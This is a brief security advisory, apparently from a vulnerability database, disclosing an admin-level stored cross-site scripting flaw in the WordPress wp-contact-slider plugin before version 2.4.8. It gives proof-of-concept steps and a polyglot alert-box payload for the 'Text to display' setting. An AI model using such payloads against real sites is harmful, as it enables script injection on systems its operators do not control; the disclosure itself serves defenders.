The plugin does not sanitize and escape its settings, allowing high privilege users such as admin to perform cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
Create/edit a Contact slider and put the payload below in the “Text to display” option:
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//“;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>alert(String.fromCharCode(88,83,83))
CPE | Name | Operator | Version |
---|---|---|---|
wp-contact-slider | lt | 2.4.8 |